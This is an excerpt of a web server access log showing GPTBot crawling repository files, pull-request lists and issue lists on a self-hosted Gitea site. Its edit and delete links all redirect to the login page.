git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:18:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 1489] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11143] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:18:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11141] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:18:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15269] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15268] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15195] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15192] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1403] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15270] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:18:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:18:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:18:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:18:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15558] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:18:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 11123] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 11121] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 11122] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:32:38 